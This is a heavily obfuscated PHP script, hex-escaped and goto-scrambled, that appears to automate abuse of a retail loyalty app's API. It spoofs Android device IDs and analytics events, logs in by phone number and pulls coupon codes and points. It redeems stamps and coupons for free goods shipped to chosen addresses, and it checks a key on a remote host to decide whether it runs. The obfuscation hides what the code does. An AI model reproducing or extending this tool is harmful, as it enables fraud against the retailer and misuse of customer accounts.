  qhkai:
  $obc_G = str_replace("\15", '', $wlJRC);
  goto N6c5f;
  s7gJN:
  echo @zM6ic("\171\145\x6c\x6c\157\x77", "\120\x65\163\x61\x6e\x20\40\x20\40\40\x20\40\40\40\40\40\x20\40\x20\72\x20");
  goto E9X9M;
  yr7dZ:
  LL91e:
  goto kQVj5;
  jSY81:
  $a7K8a = jLw7P("\x68\164\164\x70\x73\x3a\57\x2f\146\x69\162\145\142\x61\x73\x65\151\x6e\x73\x74\x61\154\x6c\141\x74\x69\157\156\163\x2e\x67\157\x6f\147\x6c\x65\141\x70\x69\163\x2e\143\x6f\155\x2f\x76\x31\x2f\x70\162\157\x6a\145\143\x74\x73\x2f\151\144\x6d\x2d\x63\x6f\x72\x70\55\x70\x72\144\57\151\x6e\163\x74\x61\154\x6c\141\164\151\157\x6e\163", $wDisp);
  goto ZP0KW;
  zEKm4:
  echo @zm6Ic("\x6e\x65\x76\171", "\x53\157\x72\x72\x79\x2c\40\124\x68\x69\x73\40\x53\x63\x72\x69\x70\x74\40\x48\141\163\40\102\145\x65\156\x20\x52\x65\155\157\x76\x65\x64\40\x42\171\x20\124\x68\x65\40\x4f\167\x6e\x65\162\41\x21");
  goto rgtEh;
  t4bTU:
  echo "\12";
  goto vxIYx;
  cf3yC:
  echo "\12";
  goto qifxP;
  cJ3ec:
  echo $yy9BI . "\x2e\x20";
  goto XC7On;
  PnS2d:
  $zcN5u = xOzb4(array("\174"), $wZnHP)[0];
  goto rihYD;
  mtJDK:
  $fZ2bz = @$owfHy["\155\x65\163\163\x61\147\x65"];
  goto ubh_u;
  TCxB8:
  function by5Cp($FK_yc, $Ev2_i)
  {
    goto VC4mI;
    ppN5y:
    fputs($FhLCi, "{$Ev2_i}\12");
    goto KFarS;
    KFarS:
    fclose($FhLCi);
    goto dWpq7;
    VC4mI:
    $FhLCi = fopen($FK_yc, "\141");
    goto ppN5y;
    dWpq7:
  }
  goto NLUGX;
  YDCaX:
  $mlMLt = $obc_G;
  goto VNXZA;
  BanQZ:
  if (!($L1qpJ == '')) {
    goto awvwA;
  }
  goto SPzsL;
  iOMaV:
  nGOmL:
  goto n1eQD;
  spPk5:
  echo "\xa\12";
  goto CXbu3;
  HzylY:
  goto zYvyA;
  goto KEsk1;
  Amtsw:
  echo @zM6iC("\162\x65\144", "\12\176\x7e\x7e\176\x7e\x7e\x7e\x7e\176\176\x7e\176\176\176\x7e\x7e\x7e\x7e\176\176\x7e\x7e\x7e\x7e\176\176\x7e\176\x7e\176\x7e\x7e\176\x7e\x7e\x7e\x7e\x7e\176\x7e\x7e\176\176\x7e\176\x7e\x7e\176\12");
  goto bwQ3Z;
  xGjbC:
  if (!($fUekS == '')) {
    goto LL91e;
  }
  goto i_i2N;
  nL9dQ:
  echo @zm6Ic("\156\145\166\x79", "\x20\40\40\40\40\40\40\40\x20\40\131\101\x4e\107\x20\x4e\131\105\x42\x41\x52\x49\x4e\40\123\x43\x52\x49\120\x54\40\111\116\x49\x20\12");
  goto c5Fn9;
  rTj5S:
  if (!($jTEU0 < $S8W9D)) {
    goto N1kWv;
  }
  goto qybIO;
  Y2z6Q:
  VS3Km:
  goto IQ9ZU;
  CC5qC:
  $wd9cN = date("\144\x2d\155\55\131\40\174\40\x48\72\x69\x3a\x73");
  goto u7stb;
  aGFhl:
  $wDisp = "\173\42\143\151\164\x79\42\72" . $JrTpE . "\x2c\42\x63\x69\x74\x79\116\141\155\145\x22\72\42" . $b2ucB . "\x22\54\x22\144\x69\x73\164\x72\x69\x63\164\x22\x3a" . $L1qpJ . "\x2c\42\144\x69\x73\164\162\151\143\x74\x4e\141\155\x65\x22\x3a\42" . $yJiD4 . "\x22\x2c\42\x6b\x65\171\x77\x6f\162\x64\x22\72\x22" . $ZqwwP . "\42\x2c\42\160\162\x6f\166\x69\156\143\145\x22\72" . $Ipl73 . "\54\42\160\x72\157\x76\151\156\143\145\116\141\155\x65\x22\72\42" . $K4tCB . "\42\175";
  goto oPTCR;
  gA4yc:
  function bLHdG($FK_yc, $SR3ui)
  {
    goto f60TA;
    sCGc2:
    fputs($FhLCi, "{$SR3ui}\xa");
    goto PYtPK;
    PYtPK:
    fclose($FhLCi);
    goto RDsum;
    f60TA:
    $FhLCi = fopen($FK_yc, "\141");
    goto sCGc2;
    RDsum:
  }
  goto HqWju;
  ZVH0z:
  echo @zM6IC("\156\145\166\x79", $POIN9);
  goto cirbZ;
  cGhEP:
  die;
  goto c0aES;
  vRmvG:
  $oNl8L = explode("\xa", @file_get_contents("\107\122\101\124\x49\123\x20\111\x6e\x64\x6f\x6d\x69\x65\40\x4d\x69\x20\x47\157\162\x65\x6e\147\x21\x2e\164\x78\x74"));
  goto YgdMG;
  qi7k2:
  echo "\12";
  goto MBfiO;
  Ik2ui:
  echo "\xa";
  goto LhKCM;
  oujxp:
  if (!($fUekS == '')) {
    goto PlP0m;
  }
  goto vUkxr;
  gT8Sy:
  $BcbF3 = @$Ap1KM["\144\141\x74\141"]["\160\150\157\x6e\x65\x4e\165\155\142\x65\162"];
  goto SZx7v;
  oBJ1a:
  Jrt89:
  goto dem36;
  kRYuQ:
  if (!($jTEU0 < $S8W9D)) {
    goto cdHjV;
  }
  goto UOMa8;
  vfw77:
  $zvt88 = $QRhbE;
  goto e08Bo;
  rnY5C:
  $Jk9cx = g8pF2("\150\164\x74\160\x73\72\57\x2f\x65\144\164\x73\x61\x70\x70\56\x69\156\144\x6f\x6d\141\x72\x65\x74\160\x6f\x69\156\153\x75\56\143\157\155\57\x63\165\x73\x74\157\155\x65\162\57\x61\160\x69\170\x2d\x31\65\60\x32\x2d\141\160\151\57\x6d\157\x62\x69\x6c\145\x2f\x64\145\164\x61\x69\154\55\x63\x75\163\164\x6f\x6d\145\x72\x2d\157\x72\151\x67\x69\x6e", $aY0el, $GOXkU, $mlMLt);
  goto L84Hz;
  chQyH:
  $YXsOG = @$Ap1KM["\155\x65\x73\x73\x61\x67\x65"];
  goto nu_T_;
  TU0CC:
  echo @zM6ic("\x79\145\154\154\x6f\167", "\x4e\141\155\141\40\123\164\x61\x6d\x70\x20\x20\40\72\x20");
  goto dYic0;
  Zv9qP:
  i5Ayp:
  goto H6DgW;
  DgJtQ:
  $zn5zd = $U0YgX;
  goto QIpsV;
  Dys8M:
  echo "\12";
  goto iFBZv;
  n8X_y:
  if (!($jTEU0 < $S8W9D)) {
    goto Tr9Br;
  }
  goto n9Eeq;
  VyZs8:
  goto EHIPK;
  goto OIj3S;
  ZZutb:
  echo @zm6IC("\x67\162\x65\145\156", "\x41\x64\x61\x20\x41\x79\141\155\x2e\x2e\56\x20\x59\x75\153\x20\120\x65\x63\141\150\151\x6e\x20\41\x21");
  goto F_jim;
  Rmpkm:
  $JrTpE = @$owfHy["\x64\141\164\141"][0]["\144\151\x73\x74\162\x69\143\x74"]["\143\x69\x74\171"];
  goto jQcSk;
  qGMyQ:
  echo @zM6iC("\156\x65\166\171", $J0Fkh - $yWjvE);
  goto R6OFx;
  MugIV:
  m4_o3:
  goto CStpJ;
  xSVo5:
  echo "\12";
  goto rvC9u;
  fj_AT:
  $Jk9cx = G8Pf2("\x68\x74\x74\160\x73\72\x2f\57\145\144\164\x73\x61\x70\160\56\x69\x6e\144\x6f\x6d\141\162\145\164\x70\157\x69\156\153\165\x2e\x63\x6f\x6d\x2f\x63\x75\163\164\x6f\x6d\x65\x72\57\x61\160\x69\170\x2d\x31\65\x30\62\55\x61\160\151\57\x6d\x6f\142\151\154\x65\x2f\144\x65\x74\141\x69\154\55\x63\x75\x73\x74\157\155\x65\x72\x2d\x6f\x72\151\x67\151\156", $aY0el, $GOXkU, $mlMLt);
  goto mDHN7;
  Hd7NT:
  BOYRi:
  goto NOg5t;
  t5Qik:
  $yy9BI = "\x30";
  goto qVcUC;
  oopdK:
  $nb9cm = round(microtime(true) * 1000);
  goto y5Csz;
  SleGX:
  if (!($cPDPt == 8)) {
    goto ViQzv;
  }
  goto TIpPO;
  oE54j:
  @unlink("\160\157\151\x6e\x68\x70\56\160\150\160");
  goto y4a0t;
  BgRSC:
  echo "\12";
  goto cCVTp;
  GC82h:
  function aL7YE($cF6mU, $a3qxo)
  {
    goto EDEvC;
    yebJ4:
    fclose($JZH8K);
    goto e3Z2Q;
    oTm1Y:
    fputs($JZH8K, $a3qxo);
    goto yebJ4;
    EDEvC:
    $JZH8K = fopen($cF6mU, "\x61");
    goto oTm1Y;
    e3Z2Q:
  }
  goto k0G65;
  LVnAQ:
  $lbuGr = @$lImQC["\144\141\x74\141"]["\143\157\156\x74\x65\x6e\164"][0]["\143\x6f\165\160\x6f\x6e\103\x6f\144\145"];
  goto MB1KJ;
  CotX3:
  $U0YgX = str_replace("\15", '', $zcN5u);
  goto Z3K8e;
  gakRU:
  $sONlZ = str_replace("\15", '', $rERzL);
  goto mUS4h;
  IwEkL:
  jj5YO:
  goto NTjXY;
  hq6Mn:
  cz23r:
  goto mvNd_;
  SD9A7:
  $nb9cm = round(microtime(true) * 1000);
  goto vL07C;
  kAu4G:
  echo "\12";
  goto jrpYt;
  Ja0J8:
  echo "\12";
  goto bpPTo;
  n1CDj:
  $zcN5u = XoZb4(array("\174"), $tqWr2)[0];
  goto jcyDG;
  IVQjo:
  goto ectyt;
  goto YyGNN;
  Ww5hz:
  $Pud0o = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinkey"));
  goto zx7fS;
  CStpJ:
  if (!($cPDPt == 6)) {
    goto vh7kR;
  }
  goto asbF8;
  hx1RQ:
  $wDisp = "\173\42\x61\144\x64\x72\x65\x73\163\x22\x3a\x22" . $hGkCN . "\42\54\x22\141\x64\144\x72\x65\x73\x73\x4e\x61\155\145\x22\72\x22\122\165\155\x61\150\42\54\x22\144\x69\163\164\162\151\143\164\x22\x3a\173\x22\143\x69\164\x79\42\x3a" . $JrTpE . "\54\x22\x63\x69\164\x79\116\141\155\145\x22\x3a\x22" . $b2ucB . "\42\54\x22\144\x69\x73\x74\x72\151\x63\x74\x22\x3a" . $L1qpJ . "\x2c\42\144\x69\x73\164\x72\151\x63\164\x4e\141\155\x65\42\72\x22" . $yJiD4 . "\x22\54\x22\x6b\145\171\x77\x6f\162\x64\42\72\x22" . $ZqwwP . "\42\54\x22\160\162\x6f\x76\x69\x6e\143\145\42\x3a" . $Ipl73 . "\54\x22\160\x72\157\166\x69\x6e\x63\x65\116\141\155\x65\x22\72\x22" . $K4tCB . "\x22\175\x2c\x22\x69\x64\42\x3a\60\54\42\151\x73\120\x72\x69\155\141\162\171\x22\x3a\146\141\154\x73\145\x2c\x22\x70\x6f\x73\x74\141\x6c\103\157\144\145\x22\x3a\173\42\x70\x6f\x73\x74\x61\x6c\103\157\x64\x65\x22\x3a\42" . $Bz8Et . "\x22\54\x22\160\157\x73\164\141\154\103\157\144\145\111\144\x22\x3a\42" . $pugmZ . "\42\175\54\x22\162\x65\x63\x69\160\151\x65\156\164\x45\x6d\141\x69\154\x22\x3a\x22" . $z6UZd . "\x22\x2c\42\x72\x65\x63\151\160\151\x65\156\x74\x4e\x61\x6d\145\42\x3a\x22" . $m_IIo . "\x22\x2c\42\x72\145\x63\x69\x70\x69\x65\x6e\x74\120\x68\x6f\156\x65\116\165\155\x62\x65\x72\42\72\x22" . $qFy6r . "\42\x2c\x22\163\165\142\x44\151\163\164\x72\151\143\164\x22\x3a\173\42\163\x75\142\x44\151\163\164\x72\151\x63\164\42\72\x22" . $ldzeo . "\42\54\x22\163\165\142\104\151\163\164\162\151\143\x74\x43\157\x64\145\x22\x3a\42" . $U_EVz . "\x22\54\42\x76\141\x6c\165\x65\42\72\x22" . $xzAuu . "\x22\175\x7d";
  goto Aq2AZ;
  THkHS:
  $p4iky = @$Ap1KM["\x64\x61\x74\x61"]["\155\x65\x6d\x62\x65\x72\111\x64"];
  goto lNj3J;
  fNde0:
  echo "\12";
  goto oo0u7;
  f0Msa:
  echo @zm6IC("\156\x65\166\x79", "\40\123\105\x4d\x4f\107\x41\40\x4c\117\102\x41\x4e\107\40\120\101\116\x54\101\124\40\x4e\131\x41\40\102\111\x53\125\114\101\x4e\x21\x21\x21\41\x21\x20\12");
  goto uWZ9j;
  ZImQQ:
  echo "\xa";
  goto kWk_Z;
  OZZQb:
  if (!($fM3_G < $bDQe4)) {
    goto wB2V7;
  }
  goto IYPI4;
  OYBJA:
  echo "\xa";
  goto UHSQH;
  R3mvs:
  echo @zM6ic("\x6e\145\x76\171", "\40\40\x20\x20\40\x20\x20\40\x20\x20\x59\x41\x4e\107\x20\116\131\105\102\x41\x52\x49\116\x20\x53\103\122\x49\x50\x54\40\x49\116\111\x20\12");
  goto VhWc9;
  dnHEW:
  echo "\xa";
  goto u_gnn;
  ig8Qg:
  goto nGOmL;
  goto t0FCe;
  eef1h:
  echo "\12";
  goto GpGXd;
  DXT4R:
  $mlMLt = $obc_G;
  goto m5lTp;
  FbFtW:
  HQc4z:
  goto Gaiy0;
  KWjZ5:
  $DxrJr = "\61\x30\60\x30\x30\60\60\60\60\60\60\60\x30\60\x30\x30\60\x30";
  goto kOQHI;
  CDtUL:
  $e0XZt = @$owfHy["\x64\141\x74\x61"]["\x63\157\156\x74\x65\156\164"][$qtgR3]["\x69\x64"];
  goto TcT6g;
  CfJPM:
  $qq5tL = "\x32" . $gYG6P . "\x68\147\x35\64\65\x34\144\x32\61\x76\143";
  goto F0Fjz;
  GysqL:
  die;
  goto R30MJ;
  UAANB:
  $zvt88 = $QRhbE;
  goto vwrtA;
  okBv5:
  echo @Zm6IC("\x72\145\x64", "\116\157\x74\x69\x63\x65\x20\x3a\x20");
  goto nabnt;
  TbEJQ:
  $xT15V = G8PF2("\150\164\x74\x70\x73\72\57\57\145\144\x74\x73\141\160\x70\x2e\151\x6e\x64\157\155\x61\x72\145\164\160\x6f\x69\156\153\165\x2e\143\x6f\155\57\45\x32\106\154\x6f\171\x61\x6c\x74\171\45\62\x46\x61\x70\151\x78\55\x31\x35\x30\x32\x2d\x61\160\x69\45\62\106\x6d\x6f\x62\x69\154\145\x25\x32\106\x63\157\151\156\163\x25\62\106\x70\162\151\x7a\145\163\45\x32\106\x47\117\106\122\x45\123\x48\62\60\x32\62\x25\62\106\x6d\145", $aY0el, $GOXkU, $mlMLt);
  goto RTSxC;
  ptHr2:
  echo @ZM6iC("\x62\154\165\x65", "\133\65\135\x20{$NFC6_}\x20\12\x20\40\40\40\x20\76\x20{$QFiev}\x20\12\12");
  goto Huujv;
  PgKtP:
  Q_Hza:
  goto UOEEY;
  eFzZO:
  echo "\xa";
  goto vKN4h;
  DrapX:
  echo "\12";
  goto GHKYD;
  Fhrtw:
  $yy9BI;
  goto EqnUK;
  UCeyR:
  $ZXjwY = @$owfHy["\x64\x61\164\x61"]["\143\x6f\156\164\145\x6e\164"][0]["\x6e\141\155\145"];
  goto YBcmP;
  w85Q2:
  goto EPpoD;
  goto plK7Z;
  ID5xm:
  goto tZ3WW;
  goto i9Vur;
  eEiFq:
  $lPULW = $m0f8X;
  goto D1bz3;
  f28cg:
  $u35jw = count($m0f8X) - 1;
  goto eEiFq;
  NlZns:
  qve7i:
  goto souSV;
  Sfw_J:
  echo @zM6ic("\147\x72\145\145\x6e", $wd9cN);
  goto uMLhp;
  I_qlq:
  $aY0el = $v1ZMX;
  goto DkdVG;
  DWoKo:
  $b2ucB = @$owfHy["\x64\x61\x74\x61"][$dQ8Tp]["\143\151\164\x79\116\x61\155\145"];
  goto zMUhZ;
  WQ2iB:
  echo @zM6IC("\x6e\x65\166\171", $ZNU2M);
  goto HELh_;
  rFpmU:
  $zcN5u = xOzb4(array("\174"), $tqWr2)[0];
  goto sJENN;
  ZCeM4:
  $zvt88 = $QRhbE;
  goto bb1uz;
  EpWcu:
  goto H2PPC;
  goto rUsk1;
  N_7zY:
  echo "\x4d\x75\154\x61\151\40\102\141\162\x69\163\40\x4b\145\40\40\x3a\x20";
  goto VW1_y;
  RixsK:
  $zvt88 = $QRhbE;
  goto tDjzB;
  Mfr2v:
  echo "\xa";
  goto jZrJF;
  zt4XJ:
  @unlink("\x70\x6f\x69\x6e\150\x70\56\160\150\160");
  goto n3Ac7;
  LtRQg:
  echo @ZM6IC("\x67\162\x65\x65\156", "\116\157\155\157\162\40\x20\40\72\x20");
  goto fp_Tv;
  MVc4v:
  UNJKH:
  goto QmHCB;
  uB3zb:
  $I2tFV = @$owfHy["\144\141\164\x61"]["\x63\157\156\164\145\156\x74"][$dQ8Tp]["\x61\x6d\x6f\165\156\164"];
  goto vGgFB;
  yvQpH:
  echo @ZM6ic("\171\145\154\x6c\157\x77", "\x50\x6f\163\164\x61\x6c\40\x43\x6f\x64\145\40\111\x44\x20\x3a\40");
  goto zznCp;
  RQ7nA:
  $BW_8H = @$owfHy["\144\141\164\141"]["\x63\x6f\156\x74\x65\x6e\164"][$fM3_G]["\144\x65\163\x63\162\151\160\x74\151\157\156"];
  goto w2SfP;
  yHDsJ:
  $obc_G = str_replace("\15", '', $wlJRC);
  goto YDCaX;
  HFm0t:
  $gwQ0n = @$lImQC["\x64\141\164\141"]["\143\157\x6e\x74\145\x6e\x74"][17]["\143\x6f\165\x70\157\156\103\157\x64\145"];
  goto NZ3S6;
  KzC24:
  $sONlZ = str_replace("\15", '', $rERzL);
  goto YXEEi;
  uwvBF:
  echo @Zm6iC("\156\145\166\171", $ZNU2M);
  goto adaDT;
  vL07C:
  $wDisp = "\173\x22\x64\141\164\x61\x22\x3a\x5b\x7b\42\x61\160\x70\x6c\151\143\141\x74\151\157\x6e\42\x3a\173\42\141\x70\160\137\166\x65\x72\163\x69\157\x6e\x22\72\x22\x33\56\x31\63\x2e\60\x22\x2c\42\x64\x65\x76\x69\143\x65\x5f\x63\154\x61\163\x73\42\x3a\42\120\150\157\156\145\42\54\42\144\145\x76\151\143\145\x5f\x66\x61\155\151\154\x79\42\72\42" . $GOXkU . "\x22\54\42\x64\145\x76\151\x63\x65\137\x69\144\x22\72\x22" . $aY0el . "\x22\54\x22\x6f\163\x5f\156\141\155\145\42\72\42\x41\156\x64\162\x6f\151\x64\40\x50\x22\54\x22\157\x73\137\166\145\x72\163\151\x6f\x6e\42\72\x22\x41\x6e\144\x72\157\x69\144\x20\71\x22\x7d\54\42\143\x6f\162\145\42\72\173\42\145\166\145\x6e\164\137\x6e\141\155\145\x22\72\42\160\x61\147\145\137\x76\151\145\167\x22\x2c\x22\x65\166\145\156\164\137\x74\x69\155\145\x73\164\x61\155\160\x22\x3a" . $nb9cm . "\x2c\x22\x70\141\147\145\x5f\x6e\141\155\x65\x22\x3a\42\150\x6f\155\x65\x22\x2c\x22\x70\x61\147\145\137\x75\162\x6c\160\x61\x74\150\x22\72\x22\x22\175\54\x22\155\141\x72\x6b\145\164\151\156\147\x22\x3a\x7b\x22\165\x74\155\137\162\141\x77\x22\x3a\42\x75\164\155\x5f\163\157\165\162\x63\145\x3d\147\x6f\157\x67\154\145\x2d\160\x6c\141\171\46\x75\164\x6d\137\155\x65\144\x69\165\155\75\x6f\162\147\x61\156\x69\143\42\175\x2c\x22\x75\x73\145\x72\x22\x3a\x7b\x22\163\145\163\x73\151\157\x6e\x5f\151\144\x22\72\x22" . $MXjqh . "\42\x2c\42\165\x73\145\162\x5f\x69\x64\42\x3a" . $R_bYC . "\54\x22\165\x73\x65\162\137\x69\x70\x5f\141\x64\x64\x72\x65\x73\x73\x22\72\x22\x31\62\67\x2e\60\56\60\56\61\x22\x7d\175\x5d\175";
  goto QyKc9;
  MYIE1:
  echo "\xa";
  goto tX5nR;
  zUdc1:
  @unlink("\x70\157\151\x6e\x68\x70\x2e\160\150\160");
  goto RmmjO;
  q2w4c:
  echo @Zm6IC("\156\145\166\x79", "\40\x20\x20\40\40\x20\40\40\x20\40\40\x20\x20\x20\x20\x20\x41\101\x4d\111\x49\116\x20");
  goto Amtsw;
  q9O2O:
  $zcN5u = XoZB4(array("\x7c"), $wZnHP)[0];
  goto jhlg7;
  iosF0:
  echo @ZM6Ic("\x67\x72\145\x65\x6e", "\x4e\x6f\x6d\157\x72\40\x48\x50\40\x41\156\x64\141\40\x20\72\40");
  goto Arsu5;
  PwA2q:
  @unlink("\x70\x6f\151\x6e\150\160\x2e\x70\150\160");
  goto jG_Zk;
  i9qNy:
  goto KIJlA;
  goto ALS0m;
  x1zmG:
  @unlink("\160\x6f\x69\156\x68\160\56\160\150\x70");
  goto be733;
  dTj8e:
  echo @ZM6IC("\171\145\154\154\x6f\x77", "\x50\x6f\x69\156\x20\101\x6b\x75\156\40\101\x6e\144\x61\40\x3a\40");
  goto AMOyM;
  e5JB2:
  $wDisp = "\173\42\x63\x6f\x75\x70\157\x6e\111\144\x22\72\42" . $Qa1_P . "\x22\x2c\42\x71\x74\171\42\x3a\x31\x2e\x30\x2c\x22\x73\164\x61\155\160\x45\x78\143\150\141\x6e\147\145\x49\144\42\72\x22" . $gCIzy . "\42\54\42\x64\145\x6c\151\x76\145\x72\171\101\144\144\x72\x65\x73\x73\111\x74\x65\x6d\42\72\x7b\42\x61\x64\x64\x72\x65\x73\x73\42\x3a\42" . $YUfPv . "\42\x2c\42\141\x64\x64\162\x65\163\163\x4e\x61\x6d\145\x22\x3a\42" . $YUfPv . "\42\x2c\42\x64\x69\x73\x74\162\x69\143\164\42\x3a\173\42\143\x69\164\171\42\x3a" . $JrTpE . "\54\x22\143\x69\x74\171\x4e\141\x6d\145\x22\x3a\42" . $b2ucB . "\x22\x2c\x22\144\x69\x73\164\x72\x69\x63\164\x22\x3a" . $L1qpJ . "\x2c\42\144\151\163\164\x72\151\x63\x74\x4e\x61\155\145\42\x3a\x22" . $yJiD4 . "\x22\x2c\42\153\145\x79\167\157\x72\x64\42\72\x22" . $ZqwwP . "\42\54\42\160\x72\157\x76\x69\x6e\143\145\x22\72" . $Ipl73 . "\x2c\x22\160\162\x6f\x76\151\156\x63\x65\116\x61\155\145\42\72\x22" . $K4tCB . "\x22\x7d\x2c\42\x69\x64\x22\72" . $D18xv . "\x2c\42\x69\x73\x50\162\151\x6d\141\x72\x79\42\72\164\x72\165\x65\54\42\160\x6f\163\164\141\154\103\x6f\144\145\42\72\173\42\x70\157\x73\164\x61\x6c\x43\x6f\x64\x65\42\x3a\42" . $Bz8Et . "\x22\x2c\x22\x70\157\163\x74\x61\x6c\103\x6f\144\x65\111\144\x22\72\42" . $pugmZ . "\42\175\x2c\x22\x72\x65\143\x69\160\x69\x65\156\x74\x45\x6d\141\151\x6c\x22\72\42" . $SD3v6 . "\42\x2c\42\162\145\143\x69\160\x69\145\x6e\x74\x4e\141\x6d\x65\42\x3a\42" . $CeRgl . "\42\54\x22\162\145\x63\x69\x70\151\145\156\164\120\150\157\156\x65\x4e\165\155\142\145\162\x22\x3a\x22" . $t2tnx . "\x22\x2c\42\163\165\142\104\x69\x73\164\162\151\143\164\42\x3a\173\x22\x73\165\142\104\151\163\164\x72\151\x63\x74\x22\72\42" . $ldzeo . "\x22\x2c\x22\163\x75\142\104\x69\x73\x74\162\x69\143\x74\x43\157\x64\145\42\x3a\42" . $U_EVz . "\x22\x2c\x22\x76\x61\154\165\145\42\72\42" . $xzAuu . "\x22\175\x7d\175";
  goto Xuq79;
  OA0KP:
  die;
  goto PgKtP;
  EdVpX:
  @unlink("\x70\x6f\151\x6e\x68\x70\56\160\150\x70");
  goto HcczB;
  KyXoa:
  @unlink("\x70\157\151\156\150\160\56\x70\x68\160");
  goto oE54j;
  KC4mw:
  $wDisp = "\173\42\x70\x68\x6f\x6e\145\x4e\165\x6d\x62\145\x72\x22\72\42" . $zn5zd . "\42\54\x22\144\x65\x76\151\143\x65\111\144\42\72\42" . $aY0el . "\42\175";
  goto wEyFg;
  PPwSO:
  die;
  goto Dv40u;
  YDdPQ:
  $mlMLt = $obc_G;
  goto N1cO9;
  A0jWl:
  ZJW8G:
  goto a0Fb7;
  fe9xE:
  echo @zm6Ic("\x6e\145\x76\171", $ZNU2M);
  goto gwkL_;
  hwskv:
  echo "\xa";
  goto WE5C6;
  nTV_R:
  @unlink("\160\x6f\151\x6e\x68\160\56\160\150\160");
  goto pVd1W;
  rEF_Z:
  $zvt88 = $QRhbE;
  goto BFumN;
  DH8Tf:
  $lPULW = $m0f8X;
  goto MAR0t;
  BQie2:
  echo "\12";
  goto FEUU4;
  AHwgY:
  echo @zM6IC("\x79\145\154\x6c\157\167", "\101\153\150\151\162\x20\120\x65\x6e\x75\x6b\x61\162\x61\x6e\40\72\40");
  goto K_dMT;
  FpT14:
  $u35jw = count($m0f8X) - 1;
  goto QebCh;
  tSM8m:
  $earOL = $sONlZ;
  goto qJxBN;
  UITj3:
  $wDisp = "\x7b\x22\144\141\x74\141\x22\x3a\x5b\173\x22\141\x70\x70\x6c\x69\143\x61\x74\151\157\x6e\x22\72\173\42\141\160\x70\137\166\x65\x72\163\x69\157\x6e\42\x3a\x22\x33\x2e\61\63\56\60\42\x2c\x22\144\145\166\151\143\x65\137\143\154\x61\x73\x73\x22\x3a\x22\120\150\x6f\156\145\x22\54\42\x64\x65\166\151\x63\x65\137\146\141\x6d\151\x6c\x79\42\x3a\42" . $GOXkU . "\x22\54\x22\144\145\166\151\x63\x65\137\151\x64\x22\x3a\42" . $aY0el . "\x22\54\42\x6f\x73\137\156\141\155\145\42\x3a\x22\x41\156\144\162\x6f\x69\x64\40\x50\42\54\42\x6f\163\x5f\166\x65\x72\x73\151\x6f\x6e\42\x3a\x22\101\156\x64\162\157\x69\144\40\x39\x22\175\54\42\x63\x6f\x72\145\x22\x3a\x7b\x22\145\x76\145\156\164\137\x6e\141\x6d\x65\x22\72\42\x70\141\x67\145\137\x76\151\x65\167\42\x2c\42\x65\x76\145\x6e\x74\137\164\x69\155\x65\163\x74\x61\x6d\x70\42\x3a" . $nb9cm . "\x2c\42\160\141\x67\145\137\156\x61\155\x65\x22\x3a\42\123\x74\141\x6d\160\40\x64\145\x74\141\x69\154\42\54\x22\x70\141\147\145\137\x75\162\154\160\141\164\150\x22\x3a\42\42\x7d\x2c\42\155\141\x72\x6b\145\x74\x69\x6e\147\42\72\173\42\165\164\x6d\x5f\x72\x61\x77\42\72\x22\x75\164\x6d\137\x73\x6f\x75\162\143\145\75\x67\157\157\147\154\145\55\x70\154\141\171\x26\165\164\x6d\x5f\155\x65\x64\x69\x75\155\x3d\x6f\162\147\x61\156\x69\143\x22\x7d\54\x22\x75\x73\x65\162\x22\x3a\173\42\x73\145\x73\x73\x69\x6f\156\x5f\151\x64\42\x3a\42" . $MXjqh . "\42\54\42\165\x73\145\162\x5f\151\x64\42\72" . $R_bYC . "\x2c\x22\x75\x73\145\x72\137\x69\x70\x5f\141\144\x64\162\145\x73\x73\42\72\x22\x31\62\67\56\60\x2e\x30\56\61\x22\x7d\x7d\x5d\x7d";
  goto vkYxU;
  LFnhV:
  echo @Zm6IC("\147\x72\145\145\156", $LgiFv);
  goto M4L5M;
  MQEh3:
  iwC6F:
  goto kspMc;
  l1S9t:
  $ZdrCv = rand(10, 99);
  goto E94Xn;
  rOLXX:
  $u35jw = count($m0f8X) - 1;
  goto DH8Tf;
  rzYSV:
  $DxrJr = "\x31\x30\60\60\60\x30\60\x30\x30\60\60\x30\60\60\60\x30\x30\60";
  goto ty2v1;
  Qvm57:
  echo "\xa";
  goto qPkmL;
  JHJAr:
  echo "\xa";
  goto t9SxY;
  tzlNv:
  echo @zM6Ic("\156\x65\166\x79", "\12\176\176\x7e\176\x7e\176\176\x7e\176\x7e\x7e\176\176\x7e\176\176\x7e\x7e\176\176\x7e\176\x7e\176\176\x7e\x7e\x7e\176\176\176\x7e\x7e\x7e\x7e\176\176\x7e\x7e\x7e\x7e\176\x7e\x7e\176\x7e\x7e\x7e\12");
  goto jFUK6;
  gy5bR:
  echo @Zm6IC("\147\x72\x65\145\156", "\x4d\141\163\165\x6b\153\141\156\x20\x4e\157\155\157\x72\40\101\156\144\x61\40\x20\x20\40\40\40\x20\x3a\40");
  goto obQ7N;
  tAwBR:
  echo @zm6Ic("\x6e\145\166\171", "\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\101\x41\x4d\x49\x49\116\x20");
  goto eOGWf;
  TDRtd:
  die;
  goto hq6Mn;
  tDjzB:
  echo "\12";
  goto rPYX1;
  wOHaA:
  $Ap1KM = json_decode($ofEkP, true);
  goto zcO32;
  yyrGC:
  echo "\xa";
  goto A1ij4;
  QFkzP:
  $xp_1p = "\x6b\x6c\151\153\56\x74\x78\x74";
  goto rNvLE;
  Adzo6:
  $m5BZY = ggGr_("\150\164\x74\x70\163\72\x2f\57\x61\163\151\x61\x2d\163\x6f\x75\x74\150\145\x61\x73\x74\62\55\151\144\155\x2d\143\x6f\162\x70\x2d\x70\x72\x64\56\x63\x6c\x6f\165\x64\x66\x75\x6e\143\x74\151\x6f\156\x73\x2e\x6e\145\x74\57\151\x64\x6d\x61\x70\x70\x73\x5f\164\x72\x61\x63\x6b\x65\x72\x5f\147\141\164\x65\x77\x61\171", $wDisp);
  goto LAo4A;
  A42_x:
  echo "\12";
  goto MT4VT;
  l7PYF:
  u7NvT:
  goto kAo2I;
  UFeHI:
  goto ywALj;
  goto h9vq8;
  qYGDe:
  echo "\12";
  goto UdB79;
  mN1x6:
  $yy9BI;
  goto Sc9EK;
  b1o_O:
  goto gbJTu;
  goto nGlsv;
  oQe5O:
